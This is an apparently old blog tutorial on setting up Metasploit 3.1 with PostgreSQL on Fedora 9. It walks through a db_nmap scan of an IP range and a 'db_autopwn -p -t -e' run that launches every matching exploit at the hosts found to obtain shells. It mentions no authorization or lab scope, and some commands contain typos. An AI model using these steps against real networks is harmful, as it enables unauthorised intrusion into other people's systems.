Metasploit autopwn

autopwn - automated execution of exploit. Rooting will be much easier for us! at least for me, but with no luck, i never manage to get a shell

This tutorial will based on Fedora 9..

Let’s start.. what we need?

• Postgres
• Metasploit Framework
• Brain

Metasploit Framework

Postgres - yum install postgres

Brain - yum install brain <>

First, start the postgresql service (/sbin/service postgresql start). For the first time, you might to setup the postgres. We will go through later. Metasploit 3 uses the ActiveRecord module (part of RoR) to provide an object-oriented interface to an arbitrary database service. Here the steps..

gem install activerecord

gem install postgresql (we use postgres as our database)

To verify our installation which produce no output of error.

$ ruby -e ‘require “rubygems”; require_gem “postgres”;’

Update ur framework! Change to the framework directory.

svn update

Postgres. Create the database. Make sure ur postgresql running first.

#su - postgres

$ psql -d template1 -U postgres

Output :

Welcome to psql 7.4.16, the PostgreSQL interactive terminal.

Type:  \\copyright for distribution terms
      \\h for help with SQL commands
      \\? for help on internal slash commands
      \\g or terminate with semicolon to execute query
      \\q to quit

template1=#

Next.

template1=# CREATE USER root WITH PASSWORD ‘myPassword’;

template1=# CREATE DATABASE metasploit3;

template1=# GRANT ALL PRIVILEGES ON DATABASE root to metasploit3;

template1=# \q

Done with our postgres stuff. Change to framework directory. Type ./msfconsole. Now u hv console for the metasploit.

[root@localhost framework-3.1]# ./msfconsole

| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
_|

=[ msf v3.1-release
+ -- --=[ 268 exploits - 118 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux

msf >

In the console, type :

load db_postgres

db_create (you will see several notice. Ignore)

db_hosts (shoud give you no output of error. Which mean your database connection with postgres is available)

db_nmap 164.0.3.* ( Change the IP according to your target. You can also change the db_namp commands. db_nmap -p 445 164.0.3.*. db_nmap will identify any host that expose the SMB service)

Done with our scanning.The fun part begin! Ouch, before that, take a look at db_autopwn commands.

msf > db_autopwn
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-s Only obtain a single shell per target system (NON-FUNCTIONAL)
-r Use a reverse connect shell
-b Use a bind shell on a random port
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range

Launch our attack!

db_autpwn -p -t -e

It will take time. So wait! If you are lucky enough, u will get a shell.

References:PostgreSQL add or create a user account and grant permission for database

http://blog.metasploit.com/2006/09/metasploit-30-automated-exploitation.html

Cheers~

Posted in: autowpn,hacking,linux,metasploit